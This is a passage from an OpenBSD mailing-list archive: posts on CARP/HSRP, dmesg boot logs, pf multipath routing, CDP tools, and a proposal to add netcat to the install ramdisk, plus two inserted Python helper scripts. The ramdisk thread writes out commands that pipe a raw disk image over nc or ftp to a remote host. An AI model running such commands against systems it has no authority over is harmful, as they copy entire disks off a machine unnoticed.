CARP / HSRP problem

2007-02-26 Thread Pete
I have a pair of 3.9 pf firewalls running CARP. I have two ethernet 
connections to my provider who is running Cisco HSRP. When they reload the 
active router or bounce the active interface, then the Ciscos can no longer 
see the CARP virtual interface until I cause a CARP failover by rebooting the 
active firewall or admining down the external interface on the active 
firewall.

Through all of this, I have outbound connectivity from the firewall since it 
is on the same subnet as the Ciscos.

I am not sure if anyone else has experienced this, but I am sure Cisco won't 
fix it.

Thanks in advance for your help.


Scud



Re: smtpd + dkimsign 7.0 upgraded to 7.1

2022-06-15 Thread Pete
Hi,

you're probably missing something along these lines:

pki mail.example.com cert "/etc/ssl/mail.example.com.crt"
pki mail.example.com key "/etc/ssl/private/mail.example.com.key"

listen on egress tls pki mail.example.com





Re: 3.8 beta requests / test result on HP DL360

2005-09-11 Thread Pete Vickers

On 23 Aug 2005, at 01:33, Theo de Raadt wrote:


We are heading towards making the real 3.8 release soonish.  I would
like to ask the community to do lots of testing over the next week if
they can.



For info, here is the latest 3.8 i386 snapshot booting on a 'common corporate workhorse' HP DL360, w/ 3GB RAM & 2xCPU and single RAID1 logical disk.


Notes:
1. micky's new ciss raid driver works very well, although it spits a few "ciss0: cmd_stat 2 scsi_stat 0x0" from time to time.
2. The second NIC (bge1) fails to be attached on a single processor kernel. Anyone got any suggestions for BIOS/boot tweaks to get this working?
3. If bsd.mp is booted then it drops into ddb> trying to attach bge1. I can try for a com port ps & trace if requested.
4. As mentioned in theo's mail 09-09-2005, bioctl supports only ami so far - I wonder if ciss support is likely? A documentation issue I suspect.

5. dmesg below:

OpenBSD 3.8 (GENERIC) #137: Thu Sep  1 17:41:20 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel(R) Xeon(TM) CPU 2.80GHz ("GenuineIntel" 686-class) 2.80 GHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,CNXT-ID

real mem  = 3220783104 (3145296K)
avail mem = 2931396608 (2862692K)
using 4278 buffers containing 161140736 bytes (157364K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 12/31/99, BIOS32 rev. 0 @ 0xf
pcibios0 at bios0: rev 2.1 @ 0xf/0x2000
pcibios0: PCI BIOS has 7 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:15:0 ("ServerWorks CSB5 SouthBridge" rev 0x00)
pcibios0: PCI bus #0 is the last bus
bios0: ROM list: 0xc/0x8000 0xc8000/0x4000 0xee000/0x2000!
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "ServerWorks CNB20-HE" rev 0x31
pchb1 at pci0 dev 0 function 1 "ServerWorks CNB20-HE" rev 0x00
pchb2 at pci0 dev 0 function 2 "ServerWorks CNB20-HE" rev 0x00
pci1 at pchb2 bus 1
bge0 at pci1 dev 2 function 0 "Broadcom BCM5703X" rev 0x02, BCM5703 A2 (0x1002): irq 11 address 00:0b:cd:4e:4a:3a
brgphy0 at bge0 phy 1: BCM5703 10/100/1000baseT PHY, rev. 2
vga1 at pci0 dev 3 function 0 "ATI Rage XL" rev 0x27
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
ciss0 at pci0 dev 4 function 0 "Compaq Smart Array 5i/532 rev.2" rev 0x01: irq 3
ciss0: 1 LD HW rev 1 FW 2.36/2.36
lmap 4000:0 scsibus0 at ciss0: 1 targets
sd0 at scsibus0 targ 0 lun 0: SCSI0 0/direct fixed
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
sd0: 34727MB, 34727 cyl, 64 head, 32 sec, 512 bytes/sec, 71122560 sec total
vendor "Compaq", unknown product 0xb203 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 0 not configured
vendor "Compaq", unknown product 0xb204 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 2 not configured

pcib0 at pci0 dev 15 function 0 "ServerWorks CSB5 SouthBridge" rev 0x93
pciide0 at pci0 dev 15 function 1 "ServerWorks CSB5 IDE" rev 0x93: DMA
atapiscsi0 at pciide0 channel 0 drive 0
scsibus1 at atapiscsi0: 2 targets
cd0 at scsibus1 targ 0 lun 0: SCSI0 5/cdrom removable
cd0(pciide0:0:0): using PIO mode 4
ohci0 at pci0 dev 15 function 2 "ServerWorks OSB4/CSB5 USB" rev 0x05: irq 10, version 1.0, legacy support
usb0 at ohci0: USB revision 1.0
uhub0 at usb0
uhub0: ServerWorks OHCI root hub, rev 1.00/1.00, addr 1
uhub0: 4 ports with 4 removable, self powered
pchb3 at pci0 dev 15 function 3 "ServerWorks CSB5 PCI" rev 0x00
pchb4 at pci0 dev 17 function 0 "ServerWorks CIOBX2" rev 0x05
pchb5 at pci0 dev 17 function 2 "ServerWorks CIOBX2" rev 0x05
pci2 at pchb5 bus 4
bge1 at pci2 dev 2 function 0 "Broadcom BCM5703X" rev 0x02: couldn't establish interrupt at irq 15
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
pcppi0 at isa0 port 0x61
midi0 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask e7ed netmask efed ttymask ffef
pctr: user-level cycle counter enabled
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
dkcsum: sd0 matches BIOS drive 0x80
root on sd0a
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
rootdev=0x400 rrootdev=0xd00 rawdev=0xd02
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0



Booting hangs at fxp detection (and crypto h/w)

2005-10-20 Thread Pete Vickers

Hi,

I'm having trouble booting an i386 box - it seems to hang at detecting the fxp NICs (2 present, on motherboard, not possible to disable in BIOS).


If I enable verbose booting in UKC it hangs at:

...
>>>probing for pcic*
>>>pcic probe returned 0
>>>fxp probe won
fxp0 at pci0 dev 16 function 0 "Intel 82559ER" rev 0x09



below is the complete dmesg, with fxp disabled to get it complete.
Anyone any ideas on possible causes/workaround ?

Also the 'vendor "Invertex", unknown product 0x0006 (class processor subclass Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured' should be a HiFn crypto card. Any ideas why this is not recognised?

thanks,

/Pete


#dmesg


OpenBSD 3.8-current (GENERIC) #202: Wed Oct 19 17:52:24 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: AMD-K6(tm)-III Processor ("AuthenticAMD" 586-class) 449 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,MCE,CX8,PGE,MMX
real mem  = 536453120 (523880K)
avail mem = 482627584 (471316K)
using 4278 buffers containing 26927104 bytes (26296K) of memory
User Kernel Config
UKC> disable fxp
103 fxp* disabled
104 fxp* disabled
UKC> exit
Continuing...
mainbus0 (root)
bios0 at mainbus0: AT/286+(d9) BIOS, date 11/16/00, BIOS32 rev. 0 @ 0xfc960
pcibios0 at bios0: rev 2.1 @ 0xfc9d0/0x900
pcibios0: PCI BIOS has 11 Interrupt Routing table entries
pcibios0: PCI Exclusive IRQs: 3 4 5 7 9 10 11 12 14 15
pcibios0: PCI Interrupt Router at 000:07:0 ("Acer Labs M1533 ISA" rev 0x00)
pcibios0: PCI bus #1 is the last bus
ipmi at mainbus0 not configured
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Acer Labs M1541 PCI" rev 0x04
ppb0 at pci0 dev 1 function 0 "Acer Labs M5243 AGP/PCI-PCI" rev 0x04
pci1 at ppb0 bus 1
ohci0 at pci0 dev 2 function 0 "Acer Labs M5237 USB" rev 0x03pci_intr_map: no mapping for pin A
: couldn't map interrupt
"Acer Labs M7101 Power" rev 0x00 at pci0 dev 3 function 0 not configured
pcib0 at pci0 dev 7 function 0 "Acer Labs M1533 ISA" rev 0xc3
vendor "Invertex", unknown product 0x0006 (class processor subclass
Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured
pciide0 at pci0 dev 15 function 0 "Acer Labs M5229 UDMA IDE" rev 0xc1: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 19092MB, 39102336 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
"Intel 82559ER" rev 0x09 at pci0 dev 16 function 0 not configured
"Intel 82559ER" rev 0x09 at pci0 dev 18 function 0 not configured
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard
pcppi0 at isa0 port 0x61
midi0 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom0: console
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
biomask ff65 netmask ff65 ttymask ffe7
pctr: user-level cycle counter enabled
mtrr: K6-family MTRR support (2 registers)
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
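A small triage script for dmesg output like the two posted above, added here as an example and not part of either post: it pulls out PCI devices that ended up "not configured", devices whose interrupt could not be established or mapped, and driver messages that repeat (the ciss0 cmd_stat lines). The sample input is assembled from lines quoted in these two posts; the regular expressions are assumptions about the layout of those particular messages, not a general dmesg grammar.

```python
import re
from collections import Counter

# Constructed sample: dmesg lines quoted in the two posts above, re-joined
# onto single lines.  Not a complete boot log.
SAMPLE_DMESG = """\
bge0 at pci1 dev 2 function 0 "Broadcom BCM5703X" rev 0x02, BCM5703 A2 (0x1002): irq 11 address 00:0b:cd:4e:4a:3a
ciss0: 1 LD HW rev 1 FW 2.36/2.36
ciss0: cmd_stat 2 scsi_stat 0x0
ciss0: cmd_stat 2 scsi_stat 0x0
vendor "Compaq", unknown product 0xb203 (class system subclass miscellaneous, rev 0x01) at pci0 dev 5 function 0 not configured
bge1 at pci2 dev 2 function 0 "Broadcom BCM5703X" rev 0x02: couldn't establish interrupt at irq 15
ohci0 at pci0 dev 2 function 0 "Acer Labs M5237 USB" rev 0x03pci_intr_map: no mapping for pin A
: couldn't map interrupt
vendor "Invertex", unknown product 0x0006 (class processor subclass Co-processor, rev 0x01) at pci0 dev 12 function 0 not configured
"Intel 82559ER" rev 0x09 at pci0 dev 16 function 0 not configured
"Intel 82559ER" rev 0x09 at pci0 dev 18 function 0 not configured
"""

# Line shapes assumed from the messages quoted above (not a general grammar).
PCI_LOC = r"(?P<loc>pci\d+ dev \d+ function \d+)"
NOT_CONFIGURED = re.compile(r"^(?P<desc>.+?) at " + PCI_LOC + r" not configured$")
IRQ_FAIL = re.compile(
    r"^(?P<dev>\w+) at " + PCI_LOC
    + r" .*?(?:couldn't establish interrupt at (?P<irq>irq \d+)"
    + r"|pci_intr_map: (?P<map>.+))$"
)
DRIVER_MSG = re.compile(r"^(?P<dev>[a-z]+\d+): (?P<msg>.+)$")


def parse_dmesg(text):
    """Return the lines a sysadmin would want to look at first."""
    unconfigured = []      # (description, PCI location)
    irq_failures = []      # (driver instance, PCI location, reason)
    messages = Counter()   # "dev: message" -> occurrences

    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = NOT_CONFIGURED.match(line)
        if m:
            unconfigured.append((m["desc"], m["loc"]))
            continue
        m = IRQ_FAIL.match(line)
        if m:
            irq_failures.append((m["dev"], m["loc"], m["irq"] or m["map"]))
            continue
        if DRIVER_MSG.match(line):
            messages[line] += 1

    return {
        "unconfigured": unconfigured,
        "irq_failures": irq_failures,
        # A driver complaining repeatedly is worth a closer look even when
        # the device otherwise works, as with ciss0 above.
        "repeated_messages": {k: n for k, n in messages.items() if n > 1},
    }


if __name__ == "__main__":
    report = parse_dmesg(SAMPLE_DMESG)
    for desc, loc in report["unconfigured"]:
        print(f"no driver attached at {loc}: {desc}")
    for dev, loc, why in report["irq_failures"]:
        print(f"{dev} at {loc}: interrupt problem ({why})")
    for msg, n in report["repeated_messages"].items():
        print(f"{n}x {msg}")
```

Feed it `dmesg` output from the machine in question (or the saved boot log) and compare the "not configured" list against what the hardware should have; an unexpected unattached device or a NIC that failed its interrupt is the first thing to chase before blaming the rest of the boot.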



Q: why is OpenBSD's openssl build without -pthread ???

2005-10-22 Thread Pete Vickers

Hi,

Can anyone tell me why OpenBSD's openssl is not built with -pthread?

I'm evaluating the 'pound' SSL reverse proxy ( http://www.apsis.ch/pound/ ), which seems to require threaded SSL libs. The OpenBSD supplied openssl seems to have threads disabled, but if I retrieve & make a local copy with the -pthread compiler option, it seems to build & run fine. I'm sure there's a good reason for it not being enabled by default - I'm just interested to know what it is...


thanks

/Pete



rapid response to ordering :-)

2005-11-04 Thread Pete Vickers

Hi,

Just to say thanks to all involved. I ordered my 3.8 CDs via the OpenBSD/europe page on Tuesday, and they arrived today (Friday)... in Norway. All intact and unblemished (as usual). Great service, thanks :-)


/Pete



Re: CDP with OpenBSD

2005-11-20 Thread Pete Vickers

Hi,

On 19. nov. 2005, at 18.58, [EMAIL PROTECTED] wrote:


Hi All,

I am searching for a Tool with which I can
do the Cisco Discovery Protocol (CDP) requests on


There's no such thing as CDP requests. A host can merely transmit (broadcast) CDP info packets (by default every 60 secs), and/or listen for them.




a OpenBSD. I searched in the ports and
packets but did not find any.
Does anyone know one?


I've used this before:

http://sourceforge.net/projects/scdp/

you need to tweak a couple of trivial 'all the world is x86' bugs, if all your world is not.

I'll make a port if there's any demand.



After a Google search I found only a pen test tool.
http://yersinia.sourceforge.net/
Looks interesting.
I tried to install it on a OpenBSD 3.7 Stable.
I got
Libpcap (at least 0.8.x) library is needed in order to compile  
Yersinia!!...

I downloaded the http://www.tcpdump.org/release/libpcap-0.9.4.tar.gz
but I was not sure to which directory I should it install.
Any hints how to upgrade the libpcap libraries and to which directory
without getting any problems?

Thanks,
Stefan




additional features in bsd.rd

2005-11-22 Thread Pete Vickers

Hi Developers,

I have a suggestion regarding ramdisk / bsd.rd: I believe it (they) could be even more useful with the addition of the 'nc' utility on its internal filesystem.


I added a line referencing /usr/bin/nc to (for example) /usr/src/distrib/i386/common/list, and made a release(8). The resulting bsd.rd file was not significantly bigger (in my completely unqualified opinion). However I could then:


1. Get a dmesg output from CD-ROM booted bsd.rd to my other machine for emailing etc.

# dmesg | nc 10.20.30.40 1234

2. Get information off a machine, either for backup purposes or data recovery etc.

# dd if=/dev/rwd0c | nc 10.20.30.40 1234

3. Restore a 'disk image' from above...

# nc -l 1234 | dd of=/dev/rwd0c

( I keep a spare USB 802.11g ural http://www.gigabyte-usa.com/Communication/Products/Products_Wireless_GN-WBKG.htm device and an official CD along with my laptop on customer visits, so this would be very convenient for me...)


If I've overlooked something, or if the size increase is in fact significant (and breaks something else), then I apologise, otherwise I hope it's a valid & useful suggestion...


p.s. I'm aware that any such network transfers would be unencrypted; obviously, depending on the sensitivity, an ethernet cross-over cable could be used. Just because I give you a gun doesn't mean you have to shoot yourself in the foot with it.



/Pete



Re: additional features in bsd.rd

2005-11-22 Thread Pete Vickers

On 22. nov. 2005, at 12.42, Stuart Henderson wrote:


--On 22 November 2005 12:01 +0100, Pete Vickers wrote:


1. Get a dmesg output from CD-ROM booted bsd.rd  to my other machine
for emailing etc.
# dmesg | nc 10.20.30.40 1234

3. Restore a  'disk image' from above...
#  nc -l 1234 | dd of=/dev/rwd0c


You can already do those things with 'ftp -o -'..


unless I read ftp(1) incorrectly, then it supports retrieve only, with no ability to send - which was my main desire.





2. Get information off a machine, either for backup purposes or data
recovery etc.
# dd if=/dev/rwd0c | nc 10.20.30.40 1234


I'm not sure the ability to dd a raw image directly is worth the extra bytes (if you look at cvs log, you'll see that quite small savings are considered important - 16k is huge in comparison to some of these).




ability to get info / files / data _off_ the machine really. But I suspect you may be correct that 16k is too 'expensive'.



/Pete



Re: additional features in bsd.rd

2005-11-24 Thread Pete Vickers

On 23. nov. 2005, at 23.03, Chris Kuethe wrote:


On 23/11/05, Olivier Cherrier <[EMAIL PROTECTED]> wrote:

You can download and upload files using ftp(1).
I use to do it since OpenBSD 2.9, using standard floppies.



i think he wants to do something like

ftp -u /tmp/thingy ftp://myserver/pub/incoming/dmesg.txt
to upload /tmp/thingy to myserver, or

dd if=/dev/wd0c bs=256k | ftp -u - ftp://myserver/pub/incoming/wd0c.img

to send a disk image someplace.

more than once i've built static copies of nc and brought them into
the ramdisk with ftp just so that i could send disk images out...


Yep, the point is that in lots of situations, you need to get info/data on/off a machine 'running' bsd.rd, and nc is, in best unix tradition, a simple, efficient, and very convenient tool to do so. You don't even need the hassle of firing up ftpd and sorting accounts etc on another machine, nc will do there too.


Since there are already several different versions of restricted space 1.44MB floppy images (floppy/B/C), and also fuller featured CD fs, maybe nc could be added just to the CD version?



/Pete



Re: #define failure opportunity

2005-11-29 Thread pete wright
On 11/28/05, Qv6 <[EMAIL PROTECTED]> wrote:
> On Monday 28 November 2005 04:04 pm, Theo de Raadt wrote:
> > This is why OpenBSD/OpenSSH does not need to hire a spin doctor.
> >
> > Other people do it for us ;)
> >
> > http://www.ssh.com/company/newsroom/article/684/
> >
> > And... thanks to those of you who supported us when they were
> > threatening to sue us years ago..
>
>
> Interesting news.
>
> I once worked for a major Telecom firm that used a commercial
> implementation of ssh. I was curious and I asked one of the other
> techies why pay for ssh when openssh is available. "Because we can go
> to the company for support" was his answer.
>
> I couldn't help but wonder what type of issues people encounter while
> using openssh. Aside from the usual software bugs, has there really
> been any major problems with openssh that the community has not fixed
> promptly?
>
>
Not that I don't think openssh is superior for the fact that it *is*
open software, but I bet that the company in question needs software
support licences for legal issues.  If the software goes tits up and
costs the company N dollars it is easier to get that money from a
commercial entity whom you have a contract with (or more likely get
money via an insurance broker of some sort).  At least that's the best
I've been able to see through that line of reasoning :^)

-p


--
~~o0OO0o~~
Pete Wright
www.nycbug.org
NYC's *BSD User Group



Re: my multipath routing questions...

2005-11-30 Thread Pete Vickers

Hi,

Dunno if OBSD & your ISP supports it, but maybe try running multi-link ppp over the links, to 'bond' them into a single virtual interface which routing could point at...


Alternatively if you are hosting, presumably most of your traffic is originating 'inbound' from the 'net, and thus your ISP will decide which physical link to send the packets down - a route-to/reply-to on your end should just keep the ip 'conversation' on that pipe.


If most of your traffic is 'outbound' originated, (e.g. just users surfing all day long), then you could (and this is just an ugly hack to get you going), still use openbgp to announce your prefixes, but don't couple FIB with kernel table, and instead have a script periodically parse a 'bgpctl sh routes...or..suchlike' output, and then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'. Obviously tweaks like polling i/f stats to measure individual utilisation and bias the number of prefixes sent to each, are possible.


Like I said, a hack, but might get you out of a tight spot...

What about multiple bgp sessions?

/Pete


On 30. nov. 2005, at 07.26, andrew fresh wrote:


Hijacking this thread, cuZ now I am worried . . . .


On Mon, Nov 28, 2005 at 11:46:56PM -0800, David Ulevitch wrote:

I'd like to hear how people are using OpenOSPFd


I will prbly use OpenOSPFd in the future, but at the moment, my question is about using OpenBGPd and multiple lines from the same provider.

I am getting 4 T1s from a single provider.  Issues with local telco
"facilities" for T3's and other things are causing me problems with
getting anything different.

I am going to end up with something like this:
san0-\
san1-\\ all connected to a single provider
san2-//
san3-/

Now, I assume I will have a single BGP session with them.  (I have very little information for lines that are supposed to be installed tomorrow morning at 9am).

Right now I have a cisco 3640 that has 2 T1's from AT&T and 2 from Sprint, it has enough trouble with those which is why I want to replace it with an OpenBSD box.  I am going to have an iBGP session with the 3640 and an eBGP session with my new provider.

I will be adding 20Mb over ethernet at some point in the fairly near future (if they can ever get it installed) and will hopefully be getting rid of the 3640 at that point.

The OpenBSD router will not be doing any NAT, it will be passing public IPs.



This is what has me worried:
On Tue, Nov 29, 2005 at 03:33:07PM +0100, Claudio Jeker wrote:

There is no kernel support for multipath routing.



I want to load balance across those 4 T1s and it is sounding like I will not be able to do that and will have to figure out how to get these 4 new lines into my old cisco router.

Unfortunately trunk(4) doesn't work with san interfaces :-( and that is how it looked possible to do the bonding/inverse muxing that I was going for.

$ ifconfig trunk0 trunkport san0 trunkport san1
ifconfig: SIOCSTRUNKPORT: Protocol not supported

It would be really kewl to use the trunk(4) interface for the BGP peer address, since it now does failover, it would be up as long as any individual lines were up.  It would be even kewler if it would be able to change the weighting on that interface depending on the number of lines in the trunk, but I guess I am dreaming again.

I guess I am looking for something like 'ip load-sharing per-packet' in cisco terms.  But my real question is:  How do I get OpenBSD to treat those 4 T1s as a single line and share the load across them?

or, how do I get a reasonable approximation from OpenBSD?


Also, with those 4 T1s, I want to make sure that in case any of the 4 go down, the BGP session will stay up.  With a cisco box, I just bind the session to a loopback address, add routes for each interface and it will choose one of the interfaces that is up to get to the destination.  How do I do this with OpenBSD?

Will the BGP session just work when I solve the load balancing issue?

or do I have to do weird things with ifstated(8) (like 16 states for the 4 lines and lots of route add/delete statements)?

or something with 'route-to' in pf?
http://marc.theaimsgroup.com/?l=openbsd-misc&m=112831360613745&w=2

This seems to work in my test environment:
# t1s is an interface group containing all of the links to that provider

pass out on t1s route-to { \
(san0 10.35.0.2) \
(san1 10.35.1.2) \
(san2 10.35.2.2) \
(san3 10.35.3.2) \
} round-robin keep state
pass in  on san0 reply-to (san0 10.35.0.2) keep state
pass in  on san1 reply-to (san1 10.35.1.2) keep state
pass in  on san2 reply-to (san2 10.35.2.2) keep state
pass in  on san3 reply-to (san3 10.35.3.2) keep state


l8rZ,
--
andrew - ICQ# 253198 - JID: [EMAIL PROTECTED]
 Proud member: http://www.mad-techies.org

BOFH excuse of the day: telnet: Unable to connect to remote host:
Connection refused
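The 'ugly hack' Pete sketches above, as an added example that is not code from any poster: take the best-path prefixes from a RIB dump, spread them across the four san links in proportion to a per-link weight (for instance derived from measured utilisation), and emit the route(8) commands that move the kernel table from the previous split to the new one. The RIB text is a constructed sample whose column layout is assumed, not real bgpctl output; the gateway addresses are the peer addresses from andrew's pf rules; only best paths (flag '>') are considered, and a link given weight 0 is treated as down and receives nothing, so no prefix is ever pointed at a dead line.

```python
import ipaddress

# Peer addresses of the four san links, taken from andrew's pf rules above.
LINKS = {"san0": "10.35.0.2", "san1": "10.35.1.2",
         "san2": "10.35.2.2", "san3": "10.35.3.2"}

# Constructed sample of a RIB dump.  The column layout (flags, destination,
# gateway, ...) is an assumption for this example, not real bgpctl output.
SAMPLE_RIB = """\
flags destination        gateway      lpref   med aspath origin
*>    10.0.0.0/8         10.35.0.2      100     0 65001 i
*>    100.64.0.0/10      10.35.0.2      100     0 65001 i
*>    172.16.0.0/12      10.35.0.2      100     0 65001 i
*>    192.0.2.0/24       10.35.0.2      100     0 65001 i
*     192.0.2.0/24       10.35.1.2      100     0 65001 i
*>    192.168.0.0/16     10.35.0.2      100     0 65001 i
*>    198.18.0.0/15      10.35.0.2      100     0 65001 i
*>    198.51.100.0/24    10.35.0.2      100     0 65001 i
*>    203.0.113.0/24     10.35.0.2      100     0 65001 i
"""


def parse_best_prefixes(text):
    """Collect the prefixes marked as best path ('>' in the flags column)."""
    best = set()
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or ">" not in parts[0]:
            continue
        try:
            best.add(ipaddress.ip_network(parts[1]))
        except ValueError:
            continue               # header or malformed line, skip it
    return sorted(best)


def distribute(prefixes, weights):
    """Assign prefixes to links so each link's share is proportional to its weight.

    weights: {iface: number}; a link with weight 0 (down, or saturated) gets
    no prefixes at all.  Greedy: each prefix goes to the link with the lowest
    assigned/weight ratio, ties broken by interface name for determinism.
    """
    live = {ifc: w for ifc, w in weights.items() if w > 0}
    if not live:
        raise ValueError("no link with a positive weight")
    assigned = {ifc: [] for ifc in live}
    for prefix in prefixes:
        ifc = min(live, key=lambda i: (len(assigned[i]) / live[i], i))
        assigned[ifc].append(prefix)
    return assigned


def route_commands(previous, current, gateways):
    """route(8) commands turning the previous assignment into the current one."""
    old = {p: ifc for ifc, ps in previous.items() for p in ps}
    new = {p: ifc for ifc, ps in current.items() for p in ps}
    cmds = []
    for p in sorted(set(old) | set(new)):
        if p not in old:
            cmds.append(f"route add {p} {gateways[new[p]]}")
        elif p not in new:
            cmds.append(f"route delete {p}")
        elif old[p] != new[p]:
            cmds.append(f"route change {p} {gateways[new[p]]}")
    return cmds


if __name__ == "__main__":
    prefixes = parse_best_prefixes(SAMPLE_RIB)
    first = distribute(prefixes, {"san0": 1, "san1": 1, "san2": 1, "san3": 1})
    for cmd in route_commands({}, first, LINKS):
        print(cmd)
    # san3 has gone down: the share it carried is re-spread over the other three.
    second = distribute(prefixes, {"san0": 1, "san1": 1, "san2": 1, "san3": 0})
    for cmd in route_commands(first, second, LINKS):
        print(cmd)
```

The script prints the commands rather than running them so the periodic job can log or review the churn; the greedy split is not sticky, so a weight change can move more prefixes than strictly necessary, which is the price of keeping the hack this short. If the kernel table is fed this way, bgpd must be run with its FIB decoupled, exactly as Pete says, or the two will fight over the same routes.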




Re: my multipath routing questions...

2005-11-30 Thread Pete Vickers

Hi,

On 30. nov. 2005, at 13.21, Claudio Jeker wrote:


On Wed, Nov 30, 2005 at 12:53:32PM +0100, Pete Vickers wrote:

Hi,

Dunno if OBSD & your ISP supports it, but maybe try running multi-link ppp over the links, to 'bond' them into a single virtual interface which routing could point at...



sppp(4) does not support multilink ppp.


shame...




Alternatively if you are hosting, presumably most of your traffic is originating 'inbound' from the 'net, and thus your ISP will decide which physical link to send the packets down - a route-to/reply-to on your end should just keep the ip 'conversation' on that pipe.

If most of your traffic is 'outbound' originated, (e.g. just users surfing all day long), then you could (and this is just an ugly hack to get you going), still use openbgp to announce your prefixes, but don't couple FIB with kernel table, and instead have a script periodically parse a 'bgpctl sh routes...or..suchlike' output, and then add 25% to each interface via 'route add w.x.y.z/nn via sanmm'. Obviously tweaks like polling i/f stats to measure individual utilisation and bias the number of prefixes sent to each, are possible.




Uhm. I think you switched the two. hosting has mostly outbound traffic
while end user cause inbound traffic.


No switch, I believe. Although I agree hosting => mostly outbound traffic, the IP conversation is initiated from the remote party, _inbound_. And therefore it's the ISP which decides which link to send the TCP SYN (or whatever) down, and thus basic route-to packet directing would tie the entire conversation to that same line.






Like I said, a hack, but might get you out of a tight spot...

what about multiple bgp sessions ?



Won't help much unless you start some real evil filtering to balance the 4 t1 links.


/Pete



Re: upgrade halted

2006-04-19 Thread Pete Vickers
If you can read /var/log/authlog, you are in wheel (unless you've changed perms on it). So just use scp to copy ksh to /usr/local/bin/tcsh...


/Pete


On 19. apr. 2006, at 17.15, Jasper Bal wrote:


Nick Holland schreef:


and then log in (or have them disable PF or ...).  You can also look at /var/log/authlog for clues as to why you can't log in as you wish now.


Nick.



Thanks Nick. Look what I found in authlog:

Apr 19 16:09:17 Speculum sshd[15678]: User jabal not allowed because shell /usr/local/bin/tcsh does not exist


This is probably stupid, but I removed the tcsh pkg. I did think about possible difficulties logging in without, but I didn't think long enough.

All my users use tcsh. Root uses csh. If I could only remember the password...


Jasper




Nokia D211 GPRS/WLAN pc-card

2006-04-26 Thread Pete Vickers

Hi,

I've just spent some time trying to get a Nokia D211 pc-card to function under OpenBSD (i386 / -current). It didn't meet with any success, so the main point of this email is to document what I tried for the archives/google. In the event anyone has had more success than me, please let me know.


The card overview is available here - http://nokia.com/phones/nokiad211/ and it essentially contains both a GPRS(GSM) radio and an 802.11b radio. However whilst windows and linux drivers are available for download, it is a dreaded binary blob, and thus virtually useless under OpenBSD unless documentation is forthcoming.


Since Nokia also have single function GPRS cards "Nokia Card Phone 2.0" ( http://www.europe.nokia.com/cda1/0,4267,2522,00.html ), I tried tweaking /usr/src/sys/dev/pcmcia/pcmciadevs etc to get the driver to attach it as one of them. And whilst the driver appears to attach:


   pccom3 at pcmcia0 function 0 "Nokia, D211" port 0xa000/16: ns8250, no fifo


it is clearly different from a real Card Phone:

   pccom3 at pcmcia0 function 0 "Nokia Mobile Phones, Nokia Card Phone" port 0xa000/16: ns16550a, 16 byte fifo


and pointing 'tip' at it does not yield anything.


Nokia also produce a single function 802.11b card "C110" ( http://www.europe.nokia.com/nokia/0,8764,2701,00.html ), so I also tried adding the D211's pcmcia details in /usr/src/sys/dev/pcmcia/if_wi_pcmcia.c etc to get that driver to attach. Alas, this was also unsuccessful: whilst the driver attached, the dmesg line indicated that the driver failed to retrieve a MAC address from the card, and no interface was created.




/Pete



Re: entering custom AT commands into ppp.conf

2006-06-08 Thread Pete Vickers

Hi,

Here's my configs, should give you some hints..

